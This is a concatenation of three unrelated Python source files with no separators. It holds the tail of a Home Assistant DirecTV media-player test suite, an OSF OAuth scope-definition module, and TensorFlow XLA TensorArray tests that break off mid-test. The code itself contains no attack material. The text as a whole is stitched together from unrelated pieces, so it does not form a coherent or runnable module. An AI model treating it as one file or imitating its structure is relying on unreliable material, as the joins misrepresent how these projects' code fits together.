data[ATTR_MEDIA_ENQUEUE] = enqueue
await hass.services.async_call(MP_DOMAIN, SERVICE_PLAY_MEDIA, data)
async def test_setup(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test setup with basic config."""
await setup_integration(hass, aioclient_mock)
assert hass.states.get(MAIN_ENTITY_ID)
assert hass.states.get(CLIENT_ENTITY_ID)
assert hass.states.get(UNAVAILABLE_ENTITY_ID)
async def test_unique_id(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test unique id."""
await setup_integration(hass, aioclient_mock)
entity_registry = er.async_get(hass)
main = entity_registry.async_get(MAIN_ENTITY_ID)
assert main.device_class == DEVICE_CLASS_RECEIVER
assert main.unique_id == "028877455858"
client = entity_registry.async_get(CLIENT_ENTITY_ID)
assert client.device_class == DEVICE_CLASS_RECEIVER
assert client.unique_id == "2CA17D1CD30X"
unavailable_client = entity_registry.async_get(UNAVAILABLE_ENTITY_ID)
assert unavailable_client.device_class == DEVICE_CLASS_RECEIVER
assert unavailable_client.unique_id == "9XXXXXXXXXX9"
async def test_supported_features(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test supported features."""
await setup_integration(hass, aioclient_mock)
# Features supported for main DVR
state = hass.states.get(MAIN_ENTITY_ID)
assert (
SUPPORT_PAUSE
| SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_NEXT_TRACK
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_PLAY
== state.attributes.get("supported_features")
)
# Feature supported for clients.
state = hass.states.get(CLIENT_ENTITY_ID)
assert (
SUPPORT_PAUSE
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_NEXT_TRACK
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_PLAY
== state.attributes.get("supported_features")
)
async def test_check_attributes(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test attributes."""
await setup_integration(hass, aioclient_mock)
state = hass.states.get(MAIN_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "17016356"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_MOVIE
assert state.attributes.get(ATTR_MEDIA_DURATION) == 7200
assert state.attributes.get(ATTR_MEDIA_POSITION) == 4437
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Snow Bride"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("HALLHD", "312")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "312"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "TV-G"
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2020, 3, 21, 13, 0, tzinfo=dt_util.UTC
)
state = hass.states.get(CLIENT_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "4405732"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_TVSHOW
assert state.attributes.get(ATTR_MEDIA_DURATION) == 1791
assert state.attributes.get(ATTR_MEDIA_POSITION) == 263
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Tyler's Ultimate"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) == "Spaghetti and Clam Sauce"
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("FOODHD", "231")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "231"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "No Rating"
assert state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2010, 7, 5, 15, 0, 8, tzinfo=dt_util.UTC
)
state = hass.states.get(MUSIC_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "76917562"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_MUSIC
assert state.attributes.get(ATTR_MEDIA_DURATION) == 86400
assert state.attributes.get(ATTR_MEDIA_POSITION) == 15050
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Sparkle In Your Eyes"
assert state.attributes.get(ATTR_MEDIA_ARTIST) == "Gerald Albright"
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) == "Slam Dunk (2014)"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("MCSJ", "851")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "851"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "TV-PG"
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2020, 3, 21, 10, 0, 0, tzinfo=dt_util.UTC
)
state = hass.states.get(STANDBY_ENTITY_ID)
assert state.state == STATE_OFF
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) is None
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) is None
assert state.attributes.get(ATTR_MEDIA_DURATION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) is None
assert state.attributes.get(ATTR_MEDIA_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_ARTIST) is None
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) is None
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) is None
assert state.attributes.get(ATTR_INPUT_SOURCE) is None
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) is None
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
state = hass.states.get(RESTRICTED_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) is None
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) is None
assert state.attributes.get(ATTR_MEDIA_DURATION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) is None
assert state.attributes.get(ATTR_MEDIA_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_ARTIST) is None
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) is None
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) is None
assert state.attributes.get(ATTR_INPUT_SOURCE) is None
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) is None
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
state = hass.states.get(UNAVAILABLE_ENTITY_ID)
assert state.state == STATE_UNAVAILABLE
async def test_attributes_paused(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test attributes while paused."""
await setup_integration(hass, aioclient_mock)
state = hass.states.get(CLIENT_ENTITY_ID)
last_updated = state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
# Test to make sure that ATTR_MEDIA_POSITION_UPDATED_AT is not
# updated if TV is paused.
with patch(
"homeassistant.util.dt.utcnow", return_value=mock_now + timedelta(minutes=5)
):
await async_media_pause(hass, CLIENT_ENTITY_ID)
await hass.async_block_till_done()
state = hass.states.get(CLIENT_ENTITY_ID)
assert state.state == STATE_PAUSED
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) == last_updated
async def test_main_services(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test the different services."""
await setup_integration(hass, aioclient_mock)
with patch("directv.DIRECTV.remote") as remote_mock:
await async_turn_off(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("poweroff", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_turn_on(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("poweron", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_pause(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("pause", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_play(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("play", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_next_track(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("ffwd", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_previous_track(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("rew", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_stop(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("stop", "0")
with patch("directv.DIRECTV.tune") as tune_mock:
await async_play_media(hass, "channel", 312, MAIN_ENTITY_ID)
await hass.async_block_till_done()
tune_mock.assert_called_once_with("312", "0")
"""
Define a set of scopes to be used by COS Internal OAuth implementation, specifically tailored to work with APIv2.
List of scopes, nomenclature, and rationale can be found in the relevant "Login as OSF- phase 2" proposal document
"""
from collections import namedtuple
from website import settings
# Public scopes are described with 3 pieces of information: list of constituent scopes, a description, and whether or
# not this scope is available to be requested by the general public
class scope(namedtuple('scope', ['parts_', 'description', 'is_public'])):
""" Patch to add `ALWAYS_PUBLIC` scope to every selectable scope,
ensuring that public endpoints are accessible with any token.
"""
@property
def parts(self):
return frozenset((CoreScopes.ALWAYS_PUBLIC, )).union(self.parts_)
class CoreScopes(object):
"""
    The smallest units of permission that can be granted - all other scopes are built out of these.
Each named constant is a single string."""
# IMPORTANT: All views should be based on the smallest number of Core scopes required to describe
# the data in that view
USERS_READ = 'users_read'
USERS_WRITE = 'users_write'
USERS_CREATE = 'users_create'
USER_EMAIL_READ = 'users.email_read'
USER_ADDON_READ = 'users.addon_read'
NODE_BASE_READ = 'nodes.base_read'
NODE_BASE_WRITE = 'nodes.base_write'
NODE_CHILDREN_READ = 'nodes.children_read'
NODE_CHILDREN_WRITE = 'nodes.children_write'
NODE_FORKS_READ = 'nodes.forks_read'
NODE_FORKS_WRITE = 'nodes.forks_write'
NODE_CONTRIBUTORS_READ = 'nodes.contributors_read'
NODE_CONTRIBUTORS_WRITE = 'nodes.contributors_write'
NODE_FILE_READ = 'nodes.files_read'
NODE_FILE_WRITE = 'nodes.files_write'
NODE_ADDON_READ = 'nodes.addon_read'
NODE_ADDON_WRITE = 'nodes.addon_write'
NODE_LINKS_READ = 'nodes.links_read'
NODE_LINKS_WRITE = 'nodes.links_write'
NODE_VIEW_ONLY_LINKS_READ = 'node.view_only_links_read'
NODE_VIEW_ONLY_LINKS_WRITE = 'node.view_only_links_write'
NODE_PREPRINTS_READ = 'node.preprints_read'
NODE_PREPRINTS_WRITE = 'node.preprints_write'
REGISTRATION_VIEW_ONLY_LINKS_READ = 'registration.view_only_links_read'
REGISTRATION_VIEW_ONLY_LINKS_WRITE = 'registration.view_only_links_write'
METASCHEMA_READ = 'metaschemas.read'
NODE_DRAFT_REGISTRATIONS_READ = 'nodes.draft_registrations_read'
NODE_DRAFT_REGISTRATIONS_WRITE = 'nodes.draft_registrations_write'
NODE_REGISTRATIONS_READ = 'nodes.registrations_read'
NODE_REGISTRATIONS_WRITE = 'nodes.registrations_write'
NODE_CITATIONS_READ = 'nodes.citations_read'
NODE_CITATIONS_WRITE = 'nodes.citations_write'
NODE_COMMENTS_READ = 'comments.data_read'
NODE_COMMENTS_WRITE = 'comments.data_write'
LICENSE_READ = 'license.data_read'
COMMENT_REPORTS_READ = 'comments.reports_read'
COMMENT_REPORTS_WRITE = 'comments.reports_write'
APPLICATIONS_READ = 'applications_read'
APPLICATIONS_WRITE = 'applications_write'
NODE_LOG_READ = 'nodes.logs_read'
TOKENS_READ = 'tokens_read'
TOKENS_WRITE = 'tokens_write'
INSTITUTION_READ = 'institutions_read'
SEARCH = 'search_read'
REVIEW_LOGS_READ = 'review_logs_read'
REVIEW_LOGS_WRITE = 'review_logs_write'
PROVIDERS_WRITE = 'providers_write'
NULL = 'null'
# NOTE: Use with extreme caution.
# This should NEVER be assigned to endpoints:
# - with mutable data,
# - that might contain *anything* that could be personally-identifiable,
# - as a write scope
ALWAYS_PUBLIC = 'always_public'
ORGANIZER_COLLECTIONS_BASE_READ = 'collections.base_read'
ORGANIZER_COLLECTIONS_BASE_WRITE = 'collections.base_write'
GUIDS_READ = 'guids.base_read'
WIKI_BASE_READ = 'wikis.base_read'
IDENTIFIERS_READ = 'identifiers.data_read'
class ComposedScopes(object):
"""
Composed scopes, listed in increasing order of access (most restrictive first). Each named constant is a tuple.
"""
# IMPORTANT: Composed scopes exist only as an internal implementation detail.
# All views should be based on selections from CoreScopes, above
# Users collection
USERS_READ = (CoreScopes.USERS_READ, )
USERS_WRITE = USERS_READ + (CoreScopes.USERS_WRITE,)
USERS_CREATE = USERS_READ + (CoreScopes.USERS_CREATE, )
# User extensions
USER_EMAIL_READ = (CoreScopes.USER_EMAIL_READ, )
# Applications collection
APPLICATIONS_READ = (CoreScopes.APPLICATIONS_READ, )
APPLICATIONS_WRITE = APPLICATIONS_READ + (CoreScopes.APPLICATIONS_WRITE,)
# Tokens collection
TOKENS_READ = (CoreScopes.TOKENS_READ,)
TOKENS_WRITE = TOKENS_READ + (CoreScopes.TOKENS_WRITE,)
# Guid redirect view
GUIDS_READ = (CoreScopes.GUIDS_READ, )
# Metaschemas collection
METASCHEMAS_READ = (CoreScopes.METASCHEMA_READ, )
# Draft registrations
DRAFT_READ = (CoreScopes.NODE_DRAFT_REGISTRATIONS_READ, )
DRAFT_WRITE = (CoreScopes.NODE_DRAFT_REGISTRATIONS_WRITE, )
# Identifier views
IDENTIFIERS_READ = (CoreScopes.IDENTIFIERS_READ, )
# Comment reports collection
COMMENT_REPORTS_READ = (CoreScopes.COMMENT_REPORTS_READ,)
COMMENT_REPORTS_WRITE = COMMENT_REPORTS_READ + (CoreScopes.COMMENT_REPORTS_WRITE,)
# Nodes collection.
# Base node data includes node metadata, links, children, and preprints.
NODE_METADATA_READ = (CoreScopes.NODE_BASE_READ, CoreScopes.NODE_CHILDREN_READ, CoreScopes.NODE_LINKS_READ,
CoreScopes.NODE_CITATIONS_READ, CoreScopes.NODE_COMMENTS_READ, CoreScopes.NODE_LOG_READ,
CoreScopes.NODE_FORKS_READ, CoreScopes.WIKI_BASE_READ, CoreScopes.LICENSE_READ,
CoreScopes.IDENTIFIERS_READ, CoreScopes.NODE_PREPRINTS_READ)
NODE_METADATA_WRITE = NODE_METADATA_READ + \
(CoreScopes.NODE_BASE_WRITE, CoreScopes.NODE_CHILDREN_WRITE, CoreScopes.NODE_LINKS_WRITE,
CoreScopes.NODE_CITATIONS_WRITE, CoreScopes.NODE_COMMENTS_WRITE, CoreScopes.NODE_FORKS_WRITE,
CoreScopes.NODE_PREPRINTS_WRITE)
# Organizer Collections collection
# Using Organizer Collections and the node links they collect. Reads Node Metadata.
ORGANIZER_READ = (CoreScopes.ORGANIZER_COLLECTIONS_BASE_READ,) + NODE_METADATA_READ
ORGANIZER_WRITE = ORGANIZER_READ + (CoreScopes.ORGANIZER_COLLECTIONS_BASE_WRITE, CoreScopes.NODE_LINKS_WRITE)
# Privileges relating to editing content uploaded under that node # TODO: Add wiki etc when implemented
NODE_DATA_READ = (CoreScopes.NODE_FILE_READ, )
NODE_DATA_WRITE = NODE_DATA_READ + \
(CoreScopes.NODE_FILE_WRITE, )
# Privileges relating to who can access a node (via contributors or registrations)
NODE_ACCESS_READ = (CoreScopes.NODE_CONTRIBUTORS_READ, CoreScopes.NODE_REGISTRATIONS_READ,
CoreScopes.NODE_VIEW_ONLY_LINKS_READ, CoreScopes.REGISTRATION_VIEW_ONLY_LINKS_READ)
NODE_ACCESS_WRITE = NODE_ACCESS_READ + \
(CoreScopes.NODE_CONTRIBUTORS_WRITE, CoreScopes.NODE_REGISTRATIONS_WRITE,
CoreScopes.NODE_VIEW_ONLY_LINKS_WRITE, CoreScopes.REGISTRATION_VIEW_ONLY_LINKS_WRITE)
# Combine all sets of node permissions into one convenience level
NODE_ALL_READ = NODE_METADATA_READ + NODE_DATA_READ + NODE_ACCESS_READ
NODE_ALL_WRITE = NODE_ALL_READ + NODE_METADATA_WRITE + NODE_DATA_WRITE + NODE_ACCESS_WRITE
# Reviews
REVIEWS_READ = (CoreScopes.REVIEW_LOGS_READ,)
REVIEWS_WRITE = (CoreScopes.REVIEW_LOGS_WRITE, CoreScopes.PROVIDERS_WRITE)
# Full permissions: all routes intended to be exposed to third party API users
FULL_READ = NODE_ALL_READ + USERS_READ + ORGANIZER_READ + GUIDS_READ + METASCHEMAS_READ + DRAFT_READ + REVIEWS_READ + (CoreScopes.INSTITUTION_READ, CoreScopes.SEARCH, )
FULL_WRITE = FULL_READ + NODE_ALL_WRITE + USERS_WRITE + ORGANIZER_WRITE + DRAFT_WRITE
# Admin permissions- includes functionality not intended for third-party use
ADMIN_LEVEL = FULL_WRITE + APPLICATIONS_WRITE + TOKENS_WRITE + COMMENT_REPORTS_WRITE + USERS_CREATE + REVIEWS_WRITE +\
(CoreScopes.USER_EMAIL_READ, CoreScopes.USER_ADDON_READ, CoreScopes.NODE_ADDON_READ, CoreScopes.NODE_ADDON_WRITE, )
# List of all publicly documented scopes, mapped to composed scopes defined above.
# Return as sets to enable fast comparisons of provided scopes vs those required by a given node
# These are the ***only*** scopes that will be recognized from CAS
public_scopes = {
'osf.full_read': scope(parts_=frozenset(ComposedScopes.FULL_READ),
description='View all information associated with this account, including for '
'private projects.',
is_public=True),
'osf.full_write': scope(parts_=frozenset(ComposedScopes.FULL_WRITE),
description='View and edit all information associated with this account, including for '
'private projects.',
is_public=True),
'osf.users.profile_read': scope(parts_=frozenset(ComposedScopes.USERS_READ),
description='Read your profile data',
is_public=True),
}
if settings.DEV_MODE:
public_scopes.update({
'osf.users.email_read': scope(parts_=frozenset(ComposedScopes.USER_EMAIL_READ),
description='Read your primary email address.',
is_public=True),
'osf.users.profile_write': scope(parts_=frozenset(ComposedScopes.USERS_WRITE),
description='Read and edit your profile data',
is_public=True),
'osf.nodes.metadata_read': scope(parts_=frozenset(ComposedScopes.NODE_METADATA_READ),
description='Read a list of all public and private nodes accessible to this '
'account, and view associated metadata such as project descriptions '
'and titles',
is_public=True),
'osf.nodes.metadata_write': scope(parts_=frozenset(ComposedScopes.NODE_METADATA_WRITE),
description='Read a list of all public and private nodes accessible to this '
'account, and view and edit associated metadata such as project '
'descriptions and titles',
is_public=True),
'osf.nodes.data_read': scope(parts_=frozenset(ComposedScopes.NODE_DATA_READ),
description='List and view files associated with any public or private projects '
'accessible to this account.',
is_public=True),
'osf.nodes.data_write': scope(parts_=frozenset(ComposedScopes.NODE_DATA_WRITE),
description='List, view, and update files associated with any public or private '
'projects accessible to this account.',
is_public=True),
'osf.nodes.access_read': scope(parts_=frozenset(ComposedScopes.NODE_ACCESS_READ),
description='View the contributors list and any established registrations '
'associated with public or private projects',
is_public=True),
'osf.nodes.access_write': scope(parts_=frozenset(ComposedScopes.NODE_ACCESS_WRITE),
description='View and edit the contributors list associated with public or '
'private projects accessible to this account. Also view and create '
'registrations.',
is_public=True), # TODO: Language: Does registrations endpoint allow creation of registrations? Is that planned?
'osf.nodes.full_read': scope(parts_=frozenset(ComposedScopes.NODE_ALL_READ),
description='View all metadata, files, and access rights associated with all public '
'and private projects accessible to this account.',
is_public=True),
'osf.nodes.full_write': scope(parts_=frozenset(ComposedScopes.NODE_ALL_WRITE),
description='View and edit all metadata, files, and access rights associated with '
'all public and private projects accessible to this account.',
is_public=True),
# Undocumented scopes that can not be requested by third parties (per CAS restriction)
'osf.users.create': scope(parts_=frozenset(ComposedScopes.USERS_CREATE),
description='This permission should only be granted to OSF collaborators. Allows a site to '
'programmatically create new users with this account.',
is_public=False),
'osf.admin': scope(parts_=frozenset(ComposedScopes.ADMIN_LEVEL),
description='This permission should only be granted to OSF administrators. Allows a site to '
'create, read, edit, and delete all information associated with this account.',
is_public=False),
})
def normalize_scopes(scopes):
"""
Given a list of public-facing scope names from a CAS token, return the list of internal scopes
This is useful for converting a single broad scope name (from CAS) into the small constituent parts
(as used by views)
:param list scopes: a list public facing scopes
"""
all_scopes = set()
for sc in scopes:
try:
scope_tuple = public_scopes[sc]
all_scopes |= scope_tuple.parts
except KeyError:
pass
return all_scopes
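# Illustrative sketch (not part of the original module): expanding a single
# public CAS scope name into its constituent core scopes; ALWAYS_PUBLIC is
# folded in by the patched `scope.parts` property above.
def _normalize_scopes_example():
    parts = normalize_scopes(['osf.users.profile_read'])
    assert CoreScopes.USERS_READ in parts
    assert CoreScopes.ALWAYS_PUBLIC in parts
    return parts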
if __name__ == '__main__':
# Print some data to console, to help audit what views/core scopes map to a given public/composed scope
# Although represented internally as a set, print as a sorted list for readability.
from pprint import pprint as pp
pp({k: sorted(v.parts)
for k, v in public_scopes.iteritems()})
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA TensorArray Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _make_converter(dtype):
def _converter(x):
return np.asarray(x).astype(dtype.as_numpy_dtype)
return _converter
class TensorArrayTest(xla_test.XLATestCase):
def testTensorArrayWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0, 3.0]])
w2 = w1.write(2, [[7.0, -8.5]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
flow = w2.flow
d0, d1, d2, flow_val = session.run([r0, r1, r2, flow])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0, 3.0]], d1)
self.assertAllEqual([[7.0, -8.5]], d2)
self.assertAllEqual([], flow_val.shape)
def _testTensorArrayWritePack(self, tf_dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
w0 = ta.write(0, convert([[4.0, 5.0]]))
w1 = w0.write(1, convert([[6.0, 7.0]]))
w2 = w1.write(2, convert([[8.0, 9.0]]))
c0 = w2.stack()
self.assertAllEqual(
convert([[[4.0, 5.0]], [[6.0, 7.0]], [[8.0, 9.0]]]), c0.eval())
def testTensorArrayWritePack(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWritePack(dtype)
def testEmptyTensorArrayPack(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
empty_element = np.zeros((0, 1), dtype=np.float32)
w0 = ta.write(0, empty_element)
w1 = w0.write(1, empty_element)
w2 = w1.write(2, empty_element)
c0 = w2.stack()
self.assertAllEqual([3, 0, 1], c0.eval().shape)
def _testTensorArrayWriteConcat(self, tf_dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
w0 = ta.write(0, convert([[4.0, 5.0], [104.0, 105.0]]))
w1 = w0.write(1, convert([[6.0, 7.0], [106.0, 107.0]]))
w2 = w1.write(2, convert([[8.0, 9.0], [204.0, 205.0]]))
c0 = w2.concat()
self.assertAllEqual(
convert([[4.0, 5.0], [104.0, 105.0], [6.0, 7.0],
[106.0, 107.0], [8.0, 9.0], [204.0, 205.0]]), c0.eval())
def testTensorArrayWriteConcat(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWriteConcat(dtype)
def _testTensorArrayUnpackRead(self, tf_dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
# Unpack a vector into scalars
w0 = ta.unstack(convert([1.0, 2.0, 3.0]))
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert(1.0), d0)
self.assertAllEqual(convert(2.0), d1)
self.assertAllEqual(convert(3.0), d2)
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
# Unpack a matrix into vectors.
w1 = ta.unstack(convert([[1.0, 1.1], [2.0, 2.1], [3.0, 3.1]]))
r0 = w1.read(0)
r1 = w1.read(1)
r2 = w1.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([1.0, 1.1]), d0)
self.assertAllEqual(convert([2.0, 2.1]), d1)
self.assertAllEqual(convert([3.0, 3.1]), d2)
# Reset ta because we're going to change the shape, else shape
# inference will throw an error.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
# Try unpacking an empty matrix, which should not cause an error.
w2 = ta.unstack(convert([[], [], []]))
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([]), d0)
self.assertAllEqual(convert([]), d1)
self.assertAllEqual(convert([]), d2)
def _testTensorArrayUnpackReadMaybeLegacy(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayUnpackRead(dtype)
def testTensorArrayUnpackRead(self):
self._testTensorArrayUnpackReadMaybeLegacy()
def _testTensorArraySplitRead(self, tf_dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
convert = _make_converter(tf_dtype)
# Split an empty vector.
lengths = constant_op.constant([0, 0, 0])
w0 = ta.split(convert([]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([]), d0)
self.assertAllEqual(convert([]), d1)
self.assertAllEqual(convert([]), d2)
# Split a vector.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
lengths = constant_op.constant([1, 1, 1])
w0 = ta.split(convert([1.0, 2.0, 3.0]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([1.0]), d0)
self.assertAllEqual(convert([2.0]), d1)
self.assertAllEqual(convert([3.0]), d2)
# Split a matrix.
ta = tensor_array_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
lengths = constant_op.constant([1, 1, 1])
w0 = ta.split(
convert([[1.0, 101.0], [2.0, 201.0], [3.0, 301.0]]), lengths=lengths)
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = session.run([r0, r1, r2])
self.assertAllEqual(convert([[1.0, 101.0]]), d0)
self.assertAllEqual(convert([[2.0, 201.0]]), d1)
self.assertAllEqual(convert([[3.0, 301.0]]), d2)
def testTensorArraySplitRead(self):
for dtype in self.numeric_tf_types:
self._testTensorArraySplitRead(dtype)
def testTensorGradArrayWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, [[-3.0]])
g_ta = w2.grad("grad")
g_w0 = g_ta.write(0, [[5.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, [[-2.0]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2 = session.run([r0, r1, r2, g_r0, g_r1, g_r2])
self.assertAllEqual([[4.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual([[-3.0]], d2)
